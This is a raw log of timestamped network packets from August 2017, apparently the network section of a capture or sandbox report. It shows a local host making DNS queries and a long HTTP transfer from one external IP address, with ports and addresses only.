Aug 23, 2017 11:21:34.711980104 MESZ	443	49195	104.27.127.62	192.168.1.16
Aug 23, 2017 11:21:34.712097883 MESZ	49195	443	192.168.1.16	104.27.127.62
Aug 23, 2017 11:21:34.719229937 MESZ	58435	53	192.168.1.16	8.8.8.8
Aug 23, 2017 11:21:34.986608982 MESZ	53	58435	8.8.8.8	192.168.1.16
Aug 23, 2017 11:21:34.997807980 MESZ	51184	53	192.168.1.16	8.8.8.8
Aug 23, 2017 11:21:35.229789972 MESZ	53	51184	8.8.8.8	192.168.1.16
Aug 23, 2017 11:21:35.233812094 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:35.233913898 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.234045982 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:35.234725952 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:35.234765053 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.537159920 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.537192106 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.537208080 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.537342072 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:35.547652960 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.547678947 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.547699928 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.547930002 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:35.552057028 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.552087069 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.552098989 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.552335024 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:35.560952902 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.560988903 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.561002016 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.561278105 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:35.568037987 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.568336964 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.568367958 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.568599939 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:35.568636894 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.581670046 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.581707001 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.581985950 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:35.582026005 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.589421034 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.589459896 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.589606047 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.589633942 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.589656115 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.589823961 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:35.589862108 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.614005089 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.614036083 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.614341974 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:35.614382982 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.621076107 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.621309996 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:35.621346951 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.635840893 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.636106968 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:35.636167049 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.650679111 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.650703907 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.650960922 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:35.651024103 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.659379959 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.659405947 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.659672976 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:35.659734011 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.667027950 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.667057037 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.667109966 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.667120934 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.667131901 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.667332888 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:35.667386055 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.689975023 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.689996958 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.690265894 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:35.690330029 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.696228981 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.696248055 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.696460009 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:35.696518898 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.698120117 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.698137999 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.698318005 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:35.698357105 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.709805965 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.709826946 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.709979057 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:35.710030079 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.718353987 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.718375921 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.718601942 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:35.718650103 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.739568949 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.739860058 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:35.739913940 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.754401922 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.754724979 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:35.754791021 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.779376030 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.779406071 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.779794931 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:35.779824018 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.794126987 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.794143915 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.794148922 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.794310093 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:35.794341087 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.810013056 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.810045004 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.810323954 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:35.810357094 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.814253092 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.814279079 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.814513922 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:35.814553976 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.836442947 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.836493015 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.836695910 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:35.836735964 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.851299047 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.851331949 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.851347923 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.851572037 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:35.851614952 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.864844084 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.864885092 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.865115881 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:35.865154028 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.866229057 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.866270065 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.866391897 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:35.866425037 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.894175053 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.894207954 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.894491911 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:35.894546032 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.899897099 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.900170088 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:35.900194883 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.914691925 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.914988995 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:35.915030003 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.929500103 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.929527998 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.929717064 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:35.929760933 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.950256109 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.950279951 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.950368881 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:35.950388908 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.951844931 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.951864958 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.951982021 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:35.951999903 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.975405931 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.975436926 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.975656986 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:35.975680113 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.994573116 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.994600058 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.994780064 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:35.994815111 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.997206926 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.997230053 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:35.997350931 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:35.997381926 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.027045012 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.027067900 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.027230978 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.027251959 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.041975975 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.041996956 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.042143106 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.042180061 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.079166889 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.079190016 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.079283953 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.079307079 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.094054937 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.094182014 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.094202995 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.108843088 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.108978987 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.109000921 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.123697996 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.123720884 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.123835087 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.123856068 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.138111115 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.138134003 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.138233900 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.138254881 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.142194033 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.142215967 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.142326117 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.142345905 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.160809994 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.160957098 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.160990953 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.164052963 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.164156914 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.164186954 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.178945065 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.178968906 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.179290056 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.179310083 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.193905115 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.193928003 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.194178104 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.194210052 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.207813978 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.207839012 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.208182096 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.208203077 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.211369038 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.211508036 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.211530924 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.230010033 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.230252981 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.230273008 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.234877110 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.234900951 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.234963894 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.234987974 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.249038935 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.249133110 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.249156952 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.253732920 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.253938913 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.253962994 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.278450966 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.278470993 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.278579950 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.278613091 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.284394026 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.284421921 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.284599066 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.284636974 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.296147108 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.296170950 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.296284914 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.296304941 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.302027941 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.302043915 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.302197933 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.302217007 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.326327085 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.326348066 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.326558113 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.326581001 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.329787016 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.329802990 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.329946995 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.329963923 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.343574047 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.343605995 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.343739986 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.343767881 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.349551916 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.349577904 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.349726915 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.349746943 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.364512920 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.364542961 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.364757061 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.364780903 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.393349886 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.393409014 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.393524885 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.393543005 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.393553019 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.393722057 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.393764973 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.408184052 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.408221960 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.408582926 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.408622026 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.415967941 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.416001081 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.416285992 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.416327000 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.431056976 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.431090117 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.431382895 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.431422949 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.446118116 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.446151972 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.446362972 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.446405888 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.455574036 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.455610991 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.455878973 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.455904007 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.461848974 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.461879969 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.462043047 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.462069035 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.479032993 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.479063034 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.479223013 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.479249954 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.488176107 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.488208055 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.488500118 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.488523006 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.495426893 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.495456934 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.495743990 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.495784998 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.501061916 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.501393080 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.501431942 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.506623983 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.506917953 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.506959915 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.510646105 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.510674000 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.510904074 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.510965109 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.524772882 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.525127888 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.525166988 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.531891108 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.532263041 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.532301903 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.547460079 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.547491074 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.547499895 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.547836065 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.547877073 MESZ	80	49196	104.24.116.148	192.168.1.16
